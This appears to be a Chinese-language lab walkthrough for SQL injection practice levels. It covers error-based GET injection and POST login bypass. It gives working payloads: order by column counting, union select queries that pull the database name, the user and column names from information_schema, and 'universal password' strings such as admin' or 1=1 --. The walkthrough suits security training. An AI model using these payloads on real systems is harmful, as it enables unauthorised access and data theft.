一、get基于报错的注入
1、利用order by 判断字段数
正确
?id=1' 报错
?id=1' order by 3 --+ (编号为3正确)------可以看出为3个字段
(编号为4错误)
2、union联合注入?id=0(不存在这样的记录,查不到的意思)(报错)
?id=0' union select 1,2,3 --+ (联合查询前面查3个后面查3个)
?id=0' union select 1,database(),user() --+ 报: 数据库名 用户名
?id=0%27 union select 1,group_concat(column_name),3 from information_schema.columns where table_name ='user' --+ 报:数据库表名
二、post基于报错的注入
在第一关卡得到用户名和密码。
输入上面的账号密码登入成功
上面是知道密码账号的,如果我们不知道怎么办了
可以先注入一下试一下注入:账号:Dumb 密码: 123456
万能密码
admin' or 1=1 -- (注意--后面有一个空格) (11关卡)
admin") or 1=1 -- (注意--后面有一个空格) (12关卡)
1、输入账号:Dumb 密码:123456(发现‘123456“)以”)结尾)
则万能密码是:admin") or 1=1 --